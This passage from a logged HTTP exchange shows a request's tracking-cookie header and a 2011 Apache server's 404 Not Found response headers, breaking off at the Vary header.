Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: